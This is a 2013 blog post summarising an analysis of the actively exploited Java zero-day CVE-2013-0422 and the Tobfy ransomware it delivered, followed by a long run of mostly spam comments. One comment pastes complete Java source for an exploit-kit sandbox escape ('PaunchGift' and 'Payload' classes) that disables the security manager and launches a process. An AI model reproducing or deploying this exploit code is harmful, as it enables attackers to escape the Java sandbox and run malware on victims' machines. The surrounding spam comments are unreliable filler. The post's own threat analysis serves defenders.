New Zero-Day Java Exploit
After Julia Wolf, Darien Kindlund, and James Bennett from FireEye, in their post: Happy New Year from new Java Zero-day, observed that a Java security bypass zero-day vulnerability (CVE-2013-0422) has been actively exploited in the wild starting Jan. 2. They have been able to reproduce the attack in-house with the latest Java 7 update (Java 7 update 10) on Windows.
Some initial landing pages are actually hosted on a popular file-sharing website. Eventually the landing pages redirect to several different domains hosting exploits and malware.
The malware will download an executable file from a remote server and execute it by exploiting the vulnerability. Though the malware is designed for Windows only, the vulnerability can also be exploited across different browsers and OS platforms.
The malware payload is ransomware, commonly known as Tobfy. It retrieves a template from the Web, in this case:
hxxp://<random>.cristmastea.info/get.php — and creates a full screen window demanding payment using some kind of social engineering scheme to scare the victim. Additionally, it disables Windows Safe Mode by deleting values under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot, and it terminates processes like “taskmgr.exe,” “msconfig.exe,” “regedit.exe,” and “cmd.exe” in order to deter the victim from trying to find or disable the malware. Strings such as:
\\xneo\\lock\\Release\\lock.pdb and “Conteneur ActiveX” were found in memory and helped make identification easier.
One more noteworthy finding is that the URLs used to download the template and make callbacks are stored XOR encoded and must be decoded before use. However, it appears the author forgot to call the decode function in the callback thread. This means that the malware is unable to communicate with the attacker. The malware is supposed to make an HTTP request for:
hxxp://<random>.my-files-download.ru/status.php, but instead requests the invalid URL
hxxp://<random>.my-files-download.ru/.ru`utr/qiq. What makes this error even worse for victims is that this callback thread determines whether the victim has paid the fee and is responsible for removing the ransomware from the system. It seems even paying up will do no good in this case!
Null Pointer 
January 27, 2013 at 5:03 pm
Aw, this was a very nice post. Finding the time and actual effort to generate a superb
article… but what can I say… I hesitate a whole lot and don’t seem to get anything done.
January 28, 2013 at 12:17 am
I just could not depart your site prior to suggesting
that I extremely loved the usual info an individual provide for your guests?
Is gonna be again continuously in order to investigate cross-check new
posts
January 28, 2013 at 3:53 am
It is in point of fact a nice and useful piece of info.
I’m happy that you shared this useful information with us. Please stay us informed like this. Thank you for sharing.
January 28, 2013 at 5:26 am
Hello there! Do you use Twitter? I’d like to follow you if that would be okay. I’m absolutely enjoying your blog
and look forward to new updates.
January 28, 2013 at 8:31 am
Your style is so unique compared to other people I have read
stuff from. Thanks for posting when you’ve got the opportunity, Guess I’ll just book mark this page.
January 29, 2013 at 4:46 am
It’s actually a nice and useful piece of information. I am glad that you just shared this helpful information with us. Please keep us up to date like this. Thank you for sharing.
January 29, 2013 at 10:22 am
Woah this weblog is wonderful i really like studying your articles. Stay up the great work! You already know, a lot of people are looking round for this info, you could help them greatly.
January 29, 2013 at 1:36 pm
What’s up Dear, are you in fact visiting this web site regularly, if so then you will definitely get pleasant knowledge.
January 29, 2013 at 3:27 pm
Wow, this piece of writing is nice, my younger sister is analyzing these kinds of things, thus I am going to convey her.
January 30, 2013 at 12:13 am
For the reason that the admin of this web site is working, no
question very shortly it will be well-known, due to its quality contents.
January 30, 2013 at 8:08 am
Hello, I enjoy reading all of your article.
I wanted to write a little comment to support you.
January 30, 2013 at 9:58 am
Aw, this was an exceptionally good post. Finding the time and actual effort to produce a top notch article… but what can I say… I procrastinate a whole lot and never seem to get nearly anything done.
January 30, 2013 at 10:13 am
I really like your blog.. very nice colors & theme.
Did you create this website yourself or did you hire someone to do it for you?
Plz respond as I’m looking to create my own blog and would like to find out where u got this from. many thanks
January 30, 2013 at 12:15 pm
I have been exploring for a bit for any high-quality articles
or blog posts in this sort of house . Exploring in Yahoo I
at last stumbled upon this site. Studying this info So i am happy to show that I have an incredibly excellent uncanny feeling
I found out exactly what I needed. I most without a doubt will make certain to do
not omit this website and give it a glance regularly.
January 30, 2013 at 6:24 pm
Admiring the hard work you put into your blog and detailed information you provide.
It’s awesome to come across a blog every once in a while that isn’t the same
out of date rehashed material. Great read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.
January 31, 2013 at 3:15 am
Your method of describing all in this piece of writing is in fact fastidious, all can simply understand it, Thanks a lot.
January 31, 2013 at 6:22 am
It’s not my first time to pay a visit this web page, i am visiting this site dailly and obtain good information from here all the time.
January 31, 2013 at 8:33 am
I am not sure the place you’re getting your information, however great topic. I needs to spend a while finding out much more or working out more. Thanks for great info I used to be on the lookout for this info for my mission.
February 1, 2013 at 1:28 am
Hey There. I found your blog using msn. This is
a very well written article. I’ll make sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely comeback.
February 1, 2013 at 8:38 am
Nice post. I was checking constantly this blog and I am impressed!
Very useful information particularly the last part 🙂 I care for such info much.
I was seeking this certain information for a long time.
Thank you and best of luck.
February 1, 2013 at 4:47 pm
I like it when folks get together and share thoughts.
Great site, keep it up!
February 1, 2013 at 4:53 pm
Hi there, its pleasant piece of writing about media print, we all be familiar with media is
a impressive source of information.
February 1, 2013 at 9:36 pm
You really make it seem so easy together with your presentation however
I in finding this topic to be actually something which
I feel I would never understand. It kind of feels too complicated and extremely large for
me. I’m taking a look forward in your next publish, I’ll attempt to get the grasp of it!
February 2, 2013 at 4:02 am
Woah! I’m really loving the template/theme of this site. It’s simple, yet effective.
A lot of times it’s challenging to get that “perfect balance” between superb usability and visual appeal. I must say that you’ve done a
amazing job with this. In addition, the blog loads super fast
for me on Chrome. Excellent Blog!
February 2, 2013 at 4:45 am
After looking over a few of the articles on your web site, I seriously like
your technique of blogging. I book-marked it to my bookmark
website list and will be checking back soon. Please check out my web site as well and tell me what you think.
February 2, 2013 at 8:35 am
Thnx for writing this information on your website.
February 2, 2013 at 2:08 pm
I don’t know whether it’s just me or if perhaps everybody else encountering problems with your blog.
It seems like some of the written text in your posts are running
off the screen. Can someone else please comment and let me
know if this is happening to them too? This may be a issue with my browser
because I’ve had this happen before. Kudos
February 3, 2013 at 3:26 am
Hey there! This is my first comment here so I just wanted to give a quick shout out
and tell you I genuinely enjoy reading your posts. Can
you suggest any other blogs/websites/forums that cover the same subjects?
Thank you!
February 5, 2013 at 12:27 pm
Hmm it appears like your site ate my first comment (it was super long) so I guess I’ll just sum it up what I submitted and say, I’m
thoroughly enjoying your blog. I too am an aspiring blog blogger but I’m still new to everything. Do you have any tips and hints for first-time blog writers? I’d really
appreciate it.
February 7, 2013 at 6:13 am
I needed to thank you for this excellent read!! I definitely loved every bit of it.
I have got you book-marked to check out new stuff you post…
February 7, 2013 at 3:30 pm
This design is steller! You definitely know how to keep a reader entertained.
Between your wit and your videos, I was almost moved to start
my own blog (well, almost…HaHa!) Wonderful job.
I really enjoyed what you had to say, and more than that, how you presented it.
Too cool!
February 10, 2013 at 5:37 pm
Thank you for the auspicious writeup. It in fact was a leisure account it.
Look complicated to more brought agreeable from you!
However, how could we keep up a correspondence?
February 11, 2013 at 6:39 am
Incredible points. Outstanding arguments. Keep up the
good work.
February 12, 2013 at 4:43 pm
You need to be a part of a contest for one of the greatest blogs online.
I most certainly will recommend this blog!
February 12, 2013 at 7:12 pm
Do you mind if I quote a couple of your articles as long as I provide credit and sources back
to your weblog? My blog site is in the very same
niche as yours and my users would certainly benefit from a lot of the information you present here.
Please let me know if this alright with you. Cheers!
February 18, 2013 at 3:57 pm
sure
February 12, 2013 at 9:46 pm
Does your website have a contact page? I’m having a tough time locating it but, I’d like to shoot
you an email. I’ve got some recommendations for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it expand over time.
February 18, 2013 at 4:17 pm
you can find all the details there…
February 14, 2013 at 12:44 am
I love it when people get together and share ideas. Great
site, keep it up!
February 14, 2013 at 2:50 am
I am sure this article has touched all the internet people,
its really really good piece of writing on building up new website.
February 14, 2013 at 5:44 am
Magnificent beat ! I wish to apprentice while you amend your web site, how
can i subscribe for a blog website? The account helped me
a acceptable deal. I had been a little bit acquainted of this your broadcast provided bright clear concept
February 14, 2013 at 9:50 am
Excellent items from you, man. I’ve take into accout your stuff previous to and you’re just extremely
magnificent. I actually like what you have bought here, certainly like what you’re saying and the way wherein you assert it. You are making it entertaining and you still take care of to stay it smart. I can not wait to read far more from you. This is really a wonderful web site.
February 15, 2013 at 4:35 am
Hello there! I know this is kinda off topic but I was wondering
which blog platform are you using for this site? I’m getting sick and tired of WordPress because I’ve had problems with hackers and I’m looking at alternatives for another platform. I would be fantastic if you could point me in the direction of a good platform.
February 15, 2013 at 1:13 pm
I’m using wordpress.
Harden your password…
February 16, 2013 at 7:01 pm
We stumbled over here from a different website and thought I might
as well check things out. I like what I see so i am just following you.
Look forward to going over your web page for a second time.
February 17, 2013 at 1:03 pm
I’m not that much of a internet reader to be honest but your blogs really nice, keep it up!
I’ll go ahead and bookmark your site to come back later on. All the best
February 17, 2013 at 2:56 pm
Definitely consider that which you said. Your favorite justification seemed to be on the
net the easiest thing to take into accout of. I say to you,
I definitely get annoyed even as folks think about
issues that they just don’t know about. You managed to hit the nail upon the top and defined out the entire thing without having side-effects , people can take a signal. Will probably be back to get more. Thanks
February 17, 2013 at 10:58 pm
Hi, Neat post. There’s an issue along with your web site in web explorer, may test this? IE nonetheless is the market chief and a huge part of other people will omit your fantastic writing because of this problem.
February 18, 2013 at 1:51 am
Do you mind if I quote a few of your posts as long as I provide credit and sources back to your webpage?
My website is in the very same area of interest as
yours and my visitors would definitely benefit from a lot of
the information you present here. Please let me know if this
alright with you. Regards!
February 18, 2013 at 3:59 pm
Sure.
February 19, 2013 at 4:16 pm
I couldn’t resist commenting. Perfectly written!
February 20, 2013 at 1:23 am
Hello! I could have sworn I’ve been to this website before but right after browsing by means of some with the post I realized it is new to me. Nonetheless, I’m surely happy I found it and I’ll be book-marking and checking back often!
February 20, 2013 at 8:03 am
This is my first time pay a visit at here and i am truly happy to
read all at alone place.
February 20, 2013 at 12:54 pm
You are so interesting! I don’t think I’ve read anything like
that before. So good to find another person with original
thoughts on this topic. Seriously.. thank you for starting this
up. This site is one thing that is required on the internet, someone with a little originality!
February 20, 2013 at 1:19 pm
Quite informative post. Your current Site style is awesome as nicely!
February 20, 2013 at 4:17 pm
/*
* From Paunch with love (Java 1.7.0_11 Exploit)
*
* Deobfuscated from Cool EK by SecurityObscurity
*
* https://twitter.com/SecObscurity
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;
public class PaunchGift extends Applet
{
public void init()
{
try
{
int length;
byte[] buffer = new byte[5000];
ByteArrayOutputStream os = new ByteArrayOutputStream();
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream(“Payload.class”);
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
os.write( buffer, 0, length );
// convert it to a simple byte array
buffer = os.toByteArray();
Class class1 = gimmeClass(“sun.org.mozilla.javascript.internal.Context”);
Method method = getMethod(class1, “enter”, true);
Object obj = method.invoke(null, new Object[0]);
Method method1 = getMethod(class1, “createClassLoader”, false);
Object obj1 = method1.invoke(obj, new Object[1]);
Class class2 = gimmeClass(“sun.org.mozilla.javascript.internal.GeneratedClassLoader”);
Method method2 = getMethod(class2, “defineClass”, false);
Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
my_class.newInstance();
Method m_outSandbox = my_class.getMethod(“outSandbox”, new Class[0]);
m_outSandbox.invoke(null, new Object[] {});
}
catch (Throwable localThrowable){}
}
private Method getMethod(Class class1, String s, boolean flag)
{
try {
Method[] amethod = (Method[])Introspector.elementFromComplex(class1, “declaredMethods”);
Method[] amethod1 = amethod;
for (int i = 0; i < amethod1.length; i++) {
Method method = amethod1[i];
String s1 = method.getName();
Class[] aclass = method.getParameterTypes();
if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
}
} catch (Exception localException) { }
return null;
}
private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
{
Object obj = null;
JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
}
}
###############################################
import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class Payload implements PrivilegedExceptionAction
{
public Payload()
{
try
{
AccessController.doPrivileged(this);
}
catch(Exception exception) { }
}
public Object run() throws Exception
{
Class cl = System.class;
Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
m.invoke(null, new Object[1]);
return null;
}
public static void outSandbox() throws Exception
{
Runtime.getRuntime().exec("calc.exe");
}
}
February 21, 2013 at 8:03 am
Wonderful blog! I found it while browsing on Yahoo News. Do you have any suggestions on how
to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Appreciate it
February 21, 2013 at 9:06 am
Just desire to say your article is as astounding. The clearness in your post is just great and i could
assume you’re an expert on this subject. Fine with your permission let me to grab your feed to keep up to date with forthcoming post. Thanks a million and please keep up the enjoyable work.
February 21, 2013 at 1:05 pm
Wow that was odd. I just wrote an really long comment but after I clicked
submit my comment didn’t appear. Grrrr… well I’m not writing all that over again.
Anyways, just wanted to say fantastic blog!
February 21, 2013 at 6:38 pm
Good way of describing, and nice paragraph to take facts about my presentation subject matter, which i am going to present in institution
of higher education.
February 21, 2013 at 9:50 pm
I delight in, lead to I found exactly what I was looking for.
You’ve ended my 4 day lengthy hunt! God Bless you man. Have a great day. Bye
February 25, 2013 at 2:34 am
There’s definately a great deal to learn about this issue. I love all of the points you have made.
February 25, 2013 at 5:11 am
Thanks for the auspicious writeup. It if truth be told was a enjoyment
account it. Glance advanced to far brought agreeable from you!
By the way, how can we communicate?
February 27, 2013 at 1:46 pm
February 27, 2013 at 1:06 am
For most up-to-date news you have to go to see world-wide-web and on the web I found
this web page as a most excellent web page for newest updates.
February 27, 2013 at 4:10 am
Hey There. I found your weblog the usage of msn.
That is a very smartly written article. I will be sure to bookmark it and return to learn more of your helpful info.
Thank you for the post. I’ll certainly return.
February 27, 2013 at 5:26 am
It’s remarkable in support of me to have a web page, which is good designed for my know-how. thanks admin
March 2, 2013 at 4:06 am
I simply want to tell you that I am newbie to blogging and site-building and absolutely liked you’re web blog. Likely I’m going to bookmark your blog post . You absolutely have good article content. Many thanks for sharing with us your website.
March 3, 2013 at 12:02 am
Yes! Finally someone writes about acme brick.
March 4, 2013 at 4:47 am
I think this is among the most vital info for me.
And i am glad reading your article. But should remark on
few general things, The web site style is wonderful, the articles is really great
: D. Good job, cheers
April 3, 2013 at 2:38 am
Appreciate this post. Will try it out.
April 5, 2013 at 7:10 pm
Howdy! I simply wish to give you a big thumbs up for your
excellent information you’ve got here on this post. I will be returning to your site for more soon.
January 7, 2014 at 5:46 am
this might seem kinda creepy but i really like the way you speak. anyways, great video! i look forward to more of these videos 🙂
January 9, 2014 at 6:11 pm
Great video, Fun and succinctly explained.. Will use it an introduction when I am giving talks to genealogists and historians on blogging